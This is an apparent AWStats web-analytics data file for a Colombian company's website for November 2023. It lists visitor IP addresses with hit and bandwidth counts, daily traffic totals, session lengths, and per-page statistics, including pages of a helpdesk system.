87.236.176.23 1 1 809 20231125224011
194.36.98.47 2 2 5498 20231127131046
199.244.88.222 1 1 4264 20231109084346
139.59.181.152 5 5 4045 20231123121748
87.236.176.96 1 1 809 20231101182326
138.199.7.229 2 2 5498 20231121060902
84.239.40.211 1 1 647 20231128033551
45.39.184.19 2 2 5498 20231115093625
186.103.26.130 2 17 6852709 20231105115645
103.149.192.72 1 1 809 20231111062309
54.81.183.58 1 15 2281920 20231107153722
167.94.146.51 1 1 809 20231121015455
23.83.88.84 2 2 5498 20231125182720
188.165.87.110 1 1 1737 20231126020432
47.91.124.195 1 1 17038 20231117231239
167.172.216.99 6 6 4854 20231111032157
143.110.213.55 1 1 4328 20231108221225
161.35.166.30 1 1 4328 20231107110507
84.239.40.202 1 1 647 20231119204657
205.210.31.134 1 1 1737 20231121120855
191.156.226.222 7 30 6946572 20231118162605
134.122.112.17 1 1 4264 20231105004407
209.170.91.201 0 2 842 
188.166.145.116 2 2 5929 20231108041829
186.30.131.5 1 15 2281920 20231128074842
87.236.176.213 2 2 1618 20231119112249
185.180.143.145 1 1 809 20231109092134
36.111.168.190 2 16 2281920 20231110110234
182.42.110.255 2 2 8528 20231109114507
40.94.227.15 0 3 362569 
191.156.154.38 0 5 23559 
134.122.44.161 1 1 809 20231123103335
185.6.9.159 1 1 17038 20231107213345
198.235.24.13 1 1 1737 20231105175820
154.37.64.58 2 2 5498 20231109103219
188.165.87.101 1 1 1737 20231129235017
173.213.84.58 3 3 8247 20231124005218
81.7.10.216 1 1 4264 20231115180017
191.156.55.39 1 3 53401 20231124061010
74.207.240.183 1 1 1737 20231108030550
65.49.1.95 1 1 809 20231121044646
162.142.125.222 1 1 809 20231114040027
186.154.35.76 1 15 2281920 20231123122416
23.105.6.28 2 2 5498 20231125234323
95.217.37.214 2 2 5498 20231127074958
191.156.49.171 0 3 4077 
45.130.203.24 1 1 3916 20231102090824
167.94.145.57 1 1 809 20231109010656
172.241.243.39 4 4 10996 20231111145053
40.94.226.74 0 4 364555 
34.66.215.97 1 1 4264 20231111091546
212.30.37.202 1 1 2749 20231116081348
143.198.204.185 1 1 17038 20231110065731
87.236.176.196 1 1 809 20231113191503
206.189.10.221 1 1 4243 20231109122918
209.97.180.87 1 1 4264 20231102060127
182.42.111.213 1 1 4264 20231114093744
205.210.31.15 1 1 1737 20231101185511
167.94.138.126 2 2 1618 20231121235207
146.190.46.74 1 1 4264 20231104063650
42.83.147.53 2 2 8528 20231127113959
146.70.181.246 2 2 5498 20231122070224
104.28.247.164 1 1 3072 20231128211008
167.248.133.183 2 2 1618 20231121004150
64.62.197.174 1 1 809 20231107173256
64.62.197.166 1 1 809 20231119202033
191.102.224.196 1 15 2281920 20231104074128
34.171.2.196 1 1 4264 20231119112406
37.59.236.242 1 1 809 20231127005603
49.7.227.204 5 5 21320 20231128192725
181.32.18.68 1 10 1218870 20231106065505
64.62.197.78 1 1 809 20231113200751
34.227.77.163 1 1 809 20231107070405
23.251.102.74 3 3 2427 20231120205556
186.31.162.57 2 17 2319463 20231123130501
64.62.197.62 1 1 809 20231117021434
35.212.10.132 1 1 4264 20231101204523
74.84.150.150 7 7 24353 20231118115353
161.35.185.225 1 1 2494 20231108155201
89.28.56.188 4 4 47496 20231127140207
117.33.163.216 2 2 8528 20231123070051
94.232.101.121 2 2 5498 20231129015046
64.62.197.140 1 1 809 20231103201802
164.90.212.103 1 1 809 20231105045000
198.235.24.231 1 1 1737 20231104005134
181.115.149.210 5 21 6511616 20231113074800
173.230.134.82 1 1 1737 20231108035050
178.185.125.197 1 1 4264 20231102210742
101.128.98.249 2 2 5498 20231101040514
23.106.20.50 2 2 5498 20231116151928
87.236.176.246 1 1 809 20231102224231
58.49.233.126 1 1 4264 20231127212629
206.189.143.129 1 1 17038 20231130220724
157.230.229.48 1 1 809 20231114000721
103.149.192.114 1 1 809 20231111081436
65.49.1.45 1 1 809 20231124231957
154.38.173.47 2 2 5498 20231129233006
191.156.58.25 0 2 342363 
87.236.176.115 1 1 809 20231128174631
162.142.125.212 1 1 809 20231128083724
198.235.24.136 1 1 1737 20231129015843
107.150.34.146 1 1 4264 20231111045011
62.133.46.13 1 1 647 20231126012451
82.147.85.79 2 2 23748 20231106071643
35.203.211.218 1 1 1737 20231110184538
62.210.90.176 5 5 4045 20231102171624
188.165.87.102 2 2 34076 20231129235807
138.199.21.202 2 2 5498 20231117051128
125.75.66.97 1 1 4264 20231118062911
167.248.133.36 1 1 809 20231113125411
205.210.31.185 1 1 1737 20231106204954
101.36.110.24 3 3 2427 20231109004927
40.94.226.4 1 3 212491 20231103073116
5.101.157.222 1 1 3916 20231116184842
23.82.40.128 2 2 5498 20231106155856
191.95.62.125 7 13 6765504 20231108190848
178.168.115.145 4 4 47496 20231128214853
203.2.64.59 1 1 4264 20231114174856
185.180.143.71 2 2 1618 20231118091123
159.203.93.20 1 1 4264 20231105115254
143.42.78.145 1 1 4264 20231130130544
124.225.164.130 1 1 4264 20231123172615
191.156.151.186 1 1 3062 20231109230625
138.197.146.8 1 1 809 20231126064351
173.44.213.202 3 3 9414 20231108104349
196.242.20.247 2 2 5498 20231116070047
198.235.24.55 1 1 1737 20231103111711
20.68.233.219 5 5 4045 20231129154522
87.236.176.82 1 1 809 20231122144925
182.42.104.32 1 1 4264 20231113100207
167.94.138.51 2 2 1618 20231129040320
167.94.138.34 3 3 2427 20231124041809
119.199.35.13 5 5 4045 20231113185603
82.80.244.51 0 3 7464 
23.82.40.113 1 1 2749 20231122145014
23.105.6.229 1 1 2749 20231101220649
34.133.103.124 1 1 4264 20231103090951
107.173.202.167 4 4 3236 20231125111830
144.91.106.14 1 1 4264 20231125222854
185.92.25.34 1 1 2749 20231129201904
62.122.184.194 3 3 40786 20231112192725
209.170.91.202 0 1 1986 
87.236.176.45 1 1 809 20231122072148
167.94.146.60 1 1 809 20231109193252
36.111.67.189 1 1 4264 20231115021724
37.27.22.101 1 1 4876 20231107183645
35.87.63.57 1 15 2281920 20231101184551
51.159.101.212 5 5 4045 20231103200844
95.214.53.103 2 2 3474 20231128065446
102.165.54.245 2 2 5498 20231127115856
191.156.177.120 0 1 29972 
157.245.105.183 1 1 4264 20231120064319
40.94.226.79 0 1 255566 
144.126.198.171 1 1 4264 20231124053512
165.227.158.127 1 1 4264 20231108064310
40.94.227.71 0 3 361320 
86.111.230.182 2 2 5498 20231118080715
37.187.215.247 1 1 1737 20231129043148
185.180.140.5 1 1 809 20231108121119
198.235.24.163 1 1 1737 20231107194503
128.90.139.140 1 1 0 20231110052339
103.149.192.170 1 1 809 20231128232827
40.94.226.56 0 4 279267 
87.249.132.143 3 3 40786 20231114024318
68.183.201.162 1 1 4264 20231116051841
206.189.11.6 2 2 7190 20231108100755
212.30.37.42 1 1 2749 20231115150834
87.236.176.91 1 1 809 20231110233217
191.156.190.23 0 2 430514 
154.201.40.34 2 2 5498 20231124070008
23.19.125.29 2 2 5498 20231110065653
66.249.64.234 0 1 286950 
54.88.179.33 1 1 17038 20231117100957
23.108.16.211 2 2 5498 20231103131529
193.42.63.218 2 2 1618 20231116171405
198.235.24.158 1 1 1737 20231101205026
62.133.46.3 1 1 647 20231124141919
205.210.31.94 1 1 1737 20231108132251
46.246.106.37 5 5 59370 20231119000835
44.204.49.249 1 1 809 20231122064822
191.156.152.214 1 3 5706778 20231109230410
87.236.176.208 1 1 809 20231104155705
181.119.64.131 5 36 7887161 20231106163226
106.119.167.146 1 1 4264 20231121153037
191.156.188.5 1 3 38901 20231118161829
82.80.249.143 0 7 3362846 
107.175.246.165 2 2 5498 20231119150643
196.242.178.242 2 2 5498 20231120004731
62.171.157.46 1 1 809 20231107042221
23.106.26.113 2 2 5498 20231126014325
23.94.143.134 2 2 1618 20231117093726
64.62.197.236 1 1 809 20231116233116
167.248.133.51 1 1 809 20231115112927
162.142.125.221 2 2 1618 20231105015844
167.248.133.123 1 1 809 20231125024501
40.94.226.24 0 2 262356 
40.94.227.31 0 2 1136514 
190.27.158.217 2 16 2286184 20231118102831
23.106.27.116 2 2 5498 20231104163445
180.102.134.69 1 1 4264 20231116165140
40.94.226.78 0 1 341838 
161.35.174.197 2 2 6715 20231109055132
198.23.196.55 1 1 4264 20231128061543
172.241.232.82 2 2 5498 20231121015328
216.24.213.254 3 3 40786 20231127053147
62.133.46.7 1 1 647 20231121140154
52.90.215.40 1 1 809 20231126194619
101.91.148.219 2 2 8528 20231129072705
167.248.133.184 1 1 809 20231128015132
161.35.174.168 1 1 2857 20231107030659
159.89.80.163 6 6 4854 20231110200409
190.109.1.158 1 15 2281920 20231117105200
65.49.1.61 1 1 809 20231124202845
167.94.138.52 3 3 2427 20231118080930
221.2.155.200 3 3 12792 20231128114530
205.210.31.51 1 1 17038 20231104053825
185.196.10.72 1 1 4264 20231119225235
64.227.22.70 1 1 4264 20231118053404
62.216.66.233 2 2 5498 20231104185409
40.94.226.39 0 2 261107 
54.36.175.53 1 1 17038 20231104212638
162.216.149.202 1 1 1737 20231119234532
36.99.136.137 2 4 35214 20231117173306
138.199.43.35 2 2 5498 20231130191350
172.241.235.141 2 2 5498 20231112122724
5.188.62.140 2 2 8528 20231112145357
86.111.229.31 2 2 5498 20231104154329
167.94.146.57 2 2 1618 20231115124237
128.14.134.134 1 1 809 20231106143353
23.106.26.190 4 4 10996 20231115045357
65.49.1.53 1 1 809 20231115020940
162.216.149.108 1 1 1737 20231110053944
185.196.10.73 2 2 8528 20231120014254
40.94.226.26 0 2 1136514 
179.43.191.18 1 1 4264 20231127131132
167.248.133.39 2 2 1618 20231114204426
68.183.201.170 1 1 4264 20231114065808
91.92.245.130 3 3 51114 20231120072926
217.148.140.145 2 2 5498 20231108024532
23.83.92.229 4 4 10996 20231121013622
65.49.1.96 1 1 809 20231110044823
87.236.176.10 1 1 809 20231115233704
88.99.73.183 1 1 809 20231127003549
180.110.203.108 1 1 4264 20231116092847
5.157.56.11 3 3 9414 20231106171842
188.126.94.164 5 5 59370 20231118024818
134.122.46.16 1 1 809 20231125003048
172.81.58.40 4 4 10996 20231110030331
103.149.192.34 1 1 809 20231128173835
65.154.226.171 1 1 4264 20231109065242
62.216.67.130 2 2 5498 20231104132158
186.148.171.210 6 25 11567050 20231121100605
198.235.24.116 1 1 17038 20231110200413
42.83.147.54 2 2 8528 20231117235743
181.115.131.220 1 15 2281920 20231106084457
182.44.8.254 2 2 8528 20231123030720
174.87.218.154 1 1 17038 20231127190029
104.248.46.199 1 1 809 20231101141232
14.215.163.132 1 1 4264 20231127012812
103.149.192.197 2 2 1618 20231119033143
172.241.168.229 2 2 5498 20231101161804
167.94.138.36 3 3 2427 20231107093550
178.254.12.205 2 2 8529 20231122163835
182.44.12.37 2 2 8528 20231114021717
31.223.44.166 1 1 647 20231124182533
183.136.225.42 1 1 1737 20231107204043
196.245.251.80 2 2 5498 20231107103158
185.180.143.79 1 1 809 20231128075038
191.156.176.137 2 4 299290 20231118162227
43.133.136.208 2 2 5498 20231127200755
167.94.146.52 3 3 2427 20231130202023
205.210.31.79 2 2 34076 20231108043426
64.62.197.168 1 1 809 20231122173712
45.130.203.20 1 1 2749 20231102090835
198.235.24.217 1 1 1737 20231111001926
167.94.138.49 4 4 3236 20231129131023
206.189.160.9 1 1 809 20231115072700
196.242.178.84 2 2 5498 20231104202256
191.156.179.134 0 2 4213963 
40.94.226.58 1 2 37543 20231103073139
181.215.25.187 1 1 2749 20231125015943
64.62.197.225 1 1 809 20231129015458
167.248.133.125 3 3 2427 20231130181614
191.156.56.114 0 5 539637 
142.93.233.201 1 1 4264 20231119065044
65.49.1.114 1 1 809 20231126231241
23.82.40.161 2 2 5498 20231130051647
23.106.28.167 2 2 5498 20231113183529
165.154.162.212 3 5 4045 20231108165035
149.5.4.212 1 1 2749 20231109044009
157.97.105.141 1 1 4264 20231124104014
45.154.138.150 1 1 4264 20231109073613
79.167.186.240 1 1 4264 20231116101944
167.248.133.52 1 1 809 20231126164522
154.201.61.4 1 1 14397 20231109213451
159.89.226.27 1 1 809 20231126012523
186.84.91.85 1 15 2281920 20231129125322
188.134.80.97 1 1 4264 20231124014503
154.202.121.200 2 2 5498 20231128124201
167.94.145.60 2 2 1618 20231122035056
182.44.2.148 1 1 4264 20231130154106
167.248.133.38 3 3 2427 20231130164503
222.79.103.59 1 1 4264 20231111020655
185.166.84.142 0 1 1986 
103.149.192.79 1 1 809 20231102012146
64.62.197.209 1 1 809 20231125173541
181.78.81.26 2 16 2286184 20231122050411
223.244.35.77 2 2 8528 20231125080319
172.241.247.147 2 2 5498 20231112125055
23.106.18.26 2 2 5498 20231129050629
167.248.133.187 1 1 809 20231129001041
185.180.143.190 2 2 1618 20231128163227
87.236.176.244 1 1 809 20231106075929
165.232.38.34 1 1 4264 20231126064331
196.64.65.141 1 1 4264 20231112221743
193.118.51.134 1 1 809 20231107103258
46.228.199.158 1 1 4264 20231110184939
164.92.158.165 1 1 809 20231128121604
185.180.143.138 5 5 4045 20231130025448
51.83.75.133 2 2 1618 20231124175951
182.42.105.85 1 1 4264 20231108232439
161.35.185.141 1 1 3062 20231107123428
135.181.188.8 4 4 10996 20231128201113
40.94.227.21 1 3 212491 20231103073159
94.156.69.32 1 1 4264 20231125123526
40.94.227.85 0 3 49662 
128.14.133.58 3 3 2427 20231127204209
38.52.155.50 1 10 1656575 20231114113451
23.105.150.19 2 2 5498 20231124095653
128.14.209.34 1 1 809 20231122202646
165.232.93.97 1 1 809 20231124191153
193.118.53.194 1 1 809 20231103170302
23.82.104.119 2 2 5498 20231120035407
170.64.137.87 1 1 809 20231120055247
23.110.171.20 2 2 5498 20231115134213
35.203.210.64 1 1 1737 20231105083759
94.102.61.45 2 2 1618 20231106094702
205.210.31.46 2 2 3474 20231107212506
191.156.62.251 0 2 4586892 
181.115.141.23 1 15 2281920 20231110114122
40.94.226.88 0 1 29972 
77.74.177.119 1 1 4264 20231128143546
198.235.24.53 1 1 1737 20231118124311
205.210.31.226 1 1 1737 20231102173925
36.99.136.129 3 3 2427 20231118032830
40.94.227.22 0 2 263340 
62.133.46.8 1 1 647 20231116002832
40.94.227.99 0 4 51440 
181.65.155.107 0 1 491746 
154.47.22.91 2 2 5498 20231111004137
181.118.147.4 0 5 1264488 
167.94.138.124 1 1 809 20231122210121
69.160.160.53 1 15 2281920 20231123035109
76.164.198.173 2 2 28912 20231105171004
103.149.192.144 1 1 809 20231102075940
185.220.101.46 1 1 4264 20231110060953
END_VISITOR

# Date - Pages - Hits - Bandwidth - Visits
BEGIN_DAY 30
20231101 43 103 12535975 21
20231102 67 155 5370842 32
20231103 64 149 18352655 26
20231104 57 103 7108519 25
20231105 31 46 6959574 21
20231106 42 92 8136578 32
20231107 41 55 2467022 32
20231108 114 150 11600453 38
20231109 54 97 23730476 36
20231110 59 110 7251745 37
20231111 50 64 2379326 27
20231112 35 35 255738 20
20231113 34 64 8894454 17
20231114 45 83 8990170 22
20231115 31 46 2840934 22
20231116 41 55 6264025 29
20231117 49 67 2503241 28
20231118 70 140 23205789 29
20231119 49 63 2539753 24
20231120 41 50 2500011 22
20231121 51 84 13957997 28
20231122 47 167 49994980 23
20231123 43 86 7048112 26
20231124 93 184 10120018 33
20231125 27 27 74725 23
20231126 43 53 5027758 25
20231127 63 101 4883093 33
20231128 99 162 9420162 41
20231129 41 70 6762663 32
20231130 91 150 9402561 25
END_DAY

# Session range - Number of visits
BEGIN_SESSION 7
15mn-30mn 12
5mn-15mn 7
30mn-1h 5
2mn-5mn 14
1h+ 1
30s-2mn 15
0s-30s 775
END_SESSION

# URL - Pages - Bandwidth - Entry - Exit
# The 25 first Pages must be first (order not required for others)
BEGIN_SIDER 42
/suspencion.php 618 545096 341 341
/contactenos.php 374 1962429 163 186
/ 303 1727822 262 232
/pqr/upload/scp/tickets.php 68 416750 1 3
/pqr/upload/scp/autocron.php 39 1638 0 1
/residenciales.php 27 110042 10 14
/index.php 26 251030 12 14
/pqr/upload/scp/logo.php 21 153832 11 8
/pqr/upload/scp/ajax.php/users/lookup/form 16 31533 0 1
/caracteristicas.php 13 106298 5 4
/pqr/upload/scp/index.php 10 40683 3 0
/pqr/upload/scp/ajax.php/form/help-topic/12 9 52092 0 0
/factores.php 8 46463 3 3
/corporativo.php 8 43734 2 3
/pqr/upload/scp/ajax.php/users/local 7 440 0 0
/procedimientos.php 7 47113 4 4
/medidor.php 6 32689 2 2
/pqr/upload/ 6 16115 0 0
/pqr/upload/scp/ajax.php/content/signature/none 6 0 0 0
/informacion_crc.php 6 21953 2 3
/control.php 5 31817 3 2
/suspencion.php/sitemap.xml 4 3236 2 2
/pqr/upload/assets/font/fontawesome-webfont.woff 4 174288 0 1
/pqr/upload/scp/ajax.php/list/3/items/43/preview 3 396 0 0
/pqr/upload/scp/ajax.php/draft/ticket.staff 2 72 0 0
/pqr/upload/captcha.php 1 3108 1 0
/pqr/upload/scp/ 1 3747 0 0
/pqr/upload/scp/ajax.php/kb/canned-response/2.json 1 206 0 0
/pqr/upload/scp/ajax.php/users/select/648 1 2395 0 0
http://proditelsas.com/contactenos.php 1 3072 1 1
/pqr/upload/account.php 1 7382 0 1
/pqr/upload/scp/ajax.php/tickets/lookup 1 22 0 0
/pqr/upload/scp/ajax.php/list/3/items/27/preview 1 123 0 1
/pqr/upload/scp/ajax.php/users/select/773 1 2374 0 0
/pqr/upload/view.php 1 1757 0 0
/pqr/upload/index.php 1 1576 0 0
/pqr/upload/ajax.php/i18n/es_MX/js 1 2799 0 0
/pqr/upload/scp/ajax.php/form/help-topic/13 1 5788 0 0
/pqr/upload/open.php 2 5824 0 1
/pqr/upload/scp/ajax.php/users/select/705 1 2415 0 0
http://proditelsas.com/ 1 17038 1 0
/pqr/upload/logo.php 2 38458 0 1
END_SIDER
